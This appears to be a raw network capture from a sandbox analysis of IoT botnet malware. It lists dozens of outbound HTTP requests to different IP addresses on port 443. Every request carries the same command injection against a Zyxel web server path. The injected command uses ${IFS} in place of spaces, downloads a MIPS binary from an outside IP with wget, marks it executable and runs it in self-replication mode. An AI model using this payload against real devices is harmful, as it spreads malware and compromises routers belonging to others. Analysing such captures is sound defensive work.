                                      Jan 19, 2024 17:29:22.570734978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1939192.168.2.1438874203.212.69.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.570795059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1940192.168.2.144245296.231.19.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.570818901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1941192.168.2.1457902137.57.195.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.570858955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1942192.168.2.1459980107.157.0.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.570900917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1943192.168.2.1440954134.112.205.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.570949078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1944192.168.2.145832465.114.61.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.570986986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1945192.168.2.1435752121.103.16.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.571037054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1946192.168.2.144388898.222.117.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.571053028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1947192.168.2.145307427.254.98.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.571100950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1948192.168.2.143857619.20.180.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.571142912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1949192.168.2.144887292.196.145.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.571181059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1950192.168.2.145745825.61.159.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.571213961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1951192.168.2.14346205.241.8.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.571261883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1952192.168.2.144486447.99.194.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.571301937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1953192.168.2.1457258142.115.167.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.571332932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1954192.168.2.1449706168.173.140.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.571352005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1955192.168.2.1455714160.2.2.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.571393013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1956192.168.2.1444010142.109.217.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.571455002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1957192.168.2.145229631.145.191.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.571480036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1958192.168.2.1458238103.181.128.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.571518898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1959192.168.2.1433268191.121.196.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.571568012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1960192.168.2.144113490.179.85.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.571619987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1961192.168.2.1444070207.88.35.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.571645021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1962192.168.2.1460736120.202.151.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.571692944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1963192.168.2.1436596176.81.146.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.571742058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1964192.168.2.1439558153.127.50.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.571793079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1965192.168.2.144961037.121.88.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.571829081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1966192.168.2.1443358136.80.95.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.571865082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1967192.168.2.1443320152.156.248.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.571887970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1968192.168.2.145522277.1.54.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.571959972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1969192.168.2.1444266154.131.40.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.571985960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1970192.168.2.1446838171.35.245.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.572038889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1971192.168.2.1443472109.39.13.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.572072029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1972192.168.2.1440654121.137.124.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.572113037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1973192.168.2.144834889.132.79.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.572140932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1974192.168.2.1454742138.60.120.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.572182894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1975192.168.2.1444938156.196.166.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.572201014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1976192.168.2.144792262.135.71.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.572252035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1977192.168.2.1442040186.193.140.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.572302103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1978192.168.2.1442146132.0.251.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.572324038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1979192.168.2.1435514179.81.80.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.572381973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1980192.168.2.144749244.5.104.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.572403908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1981192.168.2.1432970134.237.188.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.572463036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1982192.168.2.1440620176.153.27.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.572489977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1983192.168.2.145396441.255.222.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.572525978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1984192.168.2.145432496.0.106.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.572566986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1985192.168.2.1440158108.40.117.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.572622061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1986192.168.2.1455286166.213.216.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.572645903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1987192.168.2.1444336145.164.146.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.572676897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1988192.168.2.1451478151.180.146.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.572725058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1989192.168.2.1444814100.26.119.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.572778940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1990192.168.2.1442224174.73.211.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.572818041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1991192.168.2.145909686.37.188.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.572844028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1992192.168.2.1454198171.245.86.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.572907925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1993192.168.2.1433024107.47.229.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.572957993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1994192.168.2.1441924114.224.196.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.572983980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1995192.168.2.1437268178.156.0.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.573039055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1996192.168.2.145108048.19.212.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.573081970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1997192.168.2.1459560115.66.61.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.573122978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1998192.168.2.1447592161.249.22.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.573143959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1999192.168.2.1458902147.202.50.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.573218107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2000192.168.2.1450502135.46.150.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.573246002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2001192.168.2.1448364220.166.79.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.573295116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2002192.168.2.1452510182.153.241.143443
                                      TimestampBytes transferredDirectionData
